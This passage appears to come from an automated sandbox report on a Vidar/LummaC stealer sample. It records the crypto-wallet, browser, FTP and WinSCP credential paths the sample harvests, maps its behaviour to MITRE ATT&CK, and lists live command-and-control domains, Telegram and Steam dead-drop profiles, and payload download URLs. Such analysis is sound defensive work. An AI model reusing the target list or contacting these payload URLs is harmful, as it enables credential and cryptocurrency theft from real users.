Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match	File source: 0000001D.00000002.2973194670.000000000118A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2656, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.file.exe.4745570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.4745570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2656, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E1307A sqlite3_transfer_bindings,	3_2_61E1307A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E2D5E6 sqlite3_bind_int64,	3_2_61E2D5E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E2D595 sqlite3_bind_double,	3_2_61E2D595
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E0B431 sqlite3_clear_bindings,	3_2_61E0B431
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E037F3 sqlite3_value_frombind,	3_2_61E037F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E2D781 sqlite3_bind_zeroblob64,	3_2_61E2D781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E2D714 sqlite3_bind_zeroblob,	3_2_61E2D714
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E2D68C sqlite3_bind_pointer,	3_2_61E2D68C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E2D65B sqlite3_bind_null,	3_2_61E2D65B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E2D635 sqlite3_bind_int,	3_2_61E2D635
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E2D9B0 sqlite3_bind_value,	3_2_61E2D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E2D981 sqlite3_bind_text16,	3_2_61E2D981
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E2D945 sqlite3_bind_text64,	3_2_61E2D945
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E2D916 sqlite3_bind_text,	3_2_61E2D916
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E2D8E7 sqlite3_bind_blob64,	3_2_61E2D8E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E038CA sqlite3_bind_parameter_count,	3_2_61E038CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E158CA sqlite3_bind_parameter_index,	3_2_61E158CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E038DC sqlite3_bind_parameter_name,	3_2_61E038DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E2D8B8 sqlite3_bind_blob,	3_2_61E2D8B8

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	Boot or Logon Initialization Scripts	511 Process Injection	11 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	4 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Software Packing	NTDS	65 System Information Discovery	Distributed Component Object Model	2 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	251 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	41 Virtualization/Sandbox Evasion	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	511 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	42%	ReversingLabs	Win32.Trojan.Generic
file.exe	45%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\IJKFHDBKFCAA\freebl3.dll	0%	ReversingLabs
C:\ProgramData\IJKFHDBKFCAA\mozglue.dll	0%	ReversingLabs
C:\ProgramData\IJKFHDBKFCAA\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\IJKFHDBKFCAA\nss3.dll	0%	ReversingLabs
C:\ProgramData\IJKFHDBKFCAA\softokn3.dll	0%	ReversingLabs
C:\ProgramData\IJKFHDBKFCAA\vcruntime140.dll	0%	ReversingLabs
C:\ProgramData\JKFIDGDHJE.exe	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66f75fd9dc673_vasd[1].exe	29%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net02	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://crl.entrust.net/ts1ca.crl0	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
http://www.entrust.net/rpa03	0%	URL Reputation	safe
http://aia.entrust.net/ts1-chain256.cer01	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://www.entrust.net/rpa0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cowod.hopto.org	45.132.206.251	true	true	unknown
bloodqwe.shop	172.67.167.90	true	true	unknown
offensivedzvju.shop	188.114.97.3	true	true	unknown
t.me	149.154.167.99	true	true	unknown
files.bloodqwe.shop	172.67.167.90	true	true	unknown

Contacted URLs

Name	Malicious	Reputation
stogeneratmns.shop	true	unknown
reinforcenh.shop	true	unknown
https://steamcommunity.com/profiles/76561199780418869	true	unknown
ghostreedmnu.shop	true	unknown
http://cowod.hopto.org/	true	unknown
fragnantbui.shop	true	unknown
gutterydhowi.shop	true	unknown
https://offensivedzvju.shop/api	true	unknown
https://t.me/jamsemlg	true	unknown
offensivedzvju.shop	true	unknown
drawzhotdog.shop	true	unknown
https://files.bloodqwe.shop/ldms/66f75feece638_ldmg.exe	true	unknown
https://files.bloodqwe.shop/ldms/66f75fd9dc673_vasd.exe	true	unknown
vozmeatillu.shop	true	unknown
https://bloodqwe.shop/	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	GCBFBG.3.dr	false	URL Reputation: safe	unknown
https://t.me/	RegAsm.exe, 00000003.00000002.2728647991.0000000001564000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2973194670.00000000011D3000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://duckduckgo.com/ac/?q=	GCBFBG.3.dr	false	URL Reputation: safe	unknown
https://bloodqwe.shop:443csrss.exe	RegAsm.exe, 0000001D.00000002.2971207252.0000000000A9B000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://files.bloodqwe.shop/$~	RegAsm.exe, 00000003.00000002.2728647991.0000000001580000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://web.telegram.org	RegAsm.exe, 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2728647991.0000000001564000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.entrust.net03	file.exe, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, JKFIDGDHJE.exe.3.dr	false	URL Reputation: safe	unknown
https://bloodqwe.shop:4438.134	RegAsm.exe, 0000001D.00000002.2971207252.00000000009C4000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://ocsp.entrust.net02	file.exe, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, JKFIDGDHJE.exe.3.dr	false	URL Reputation: safe	unknown
http://cowod.hopto.org	RegAsm.exe, 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://t.me/jamsemlgdsgwegsdhttps://steamcommunity.com/profiles/76561199780418869u55uMozilla/5.0	file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, JKFIDGDHJE.exe, 00000013.00000002.2710042416.000000000459B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2971207252.0000000000437000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://bloodqwe.shop:443Local	RegAsm.exe, 0000001D.00000002.2971207252.0000000000A9B000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	GCBFBG.3.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp, AECAKE.3.dr	false		unknown
http://cowod.hopto.org/e	RegAsm.exe, 00000003.00000002.2728647991.0000000001757000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://offensivedzvju.shop/	RegAsm.exe, 0000000D.00000002.2667736054.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2667736054.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://cowod.hoptoEBFHIEG	RegAsm.exe, 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://cowod.hopto.org_DEBUG.zip/c	file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://bloodqwe.shop/#	RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://t.me/dZ	RegAsm.exe, 0000001D.00000002.2973194670.00000000011D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://files.bloodqwe.shop/ldms/66f75fd9dc673_vasd.exeta;	RegAsm.exe, 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://files.bloodqwe.shop/ldms/66f75feece638_ldmg.exeta;	RegAsm.exe, 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://cowod.hopto.	RegAsm.exe, 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	GCBFBG.3.dr	false	URL Reputation: safe	unknown
https://offensivedzvju.shop/pi	RegAsm.exe, 0000000D.00000002.2667736054.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://cowod.hopto	RegAsm.exe, 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://cowod.JECFIEBFHIEG	RegAsm.exe, 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://crl.entrust.net/ts1ca.crl0	file.exe, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, JKFIDGDHJE.exe.3.dr	false	URL Reputation: safe	unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://t.me/ae5ed	file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, JKFIDGDHJE.exe, 00000013.00000002.2710042416.000000000459B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2971207252.0000000000437000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mozglue.dll.3.dr	false		unknown
https://bloodqwe.shop/D	RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://mozilla.org0/	file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	GCBFBG.3.dr	false		unknown
https://bloodqwe.shop/H	RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp, AECAKE.3.dr	false		unknown
